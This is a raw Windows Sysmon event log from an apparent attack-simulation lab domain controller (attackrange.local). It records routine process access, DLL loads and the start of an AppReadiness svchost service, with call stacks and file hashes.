13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+c029|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+bfb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+b81e|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+b780|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+c029|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+bfb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+c029|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+bfb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.810{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+b81e|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.795{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+b780|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.795{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+c029|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.779{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.779{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+bfb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.764{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.748{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000010000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.732{08A6967A-4754-6000-1805-000000009A01}4660C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000009999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4286-6000-0A00-000000009A01}8442520C:\Windows\system32\services.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.724{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k AppReadinessC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000009991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 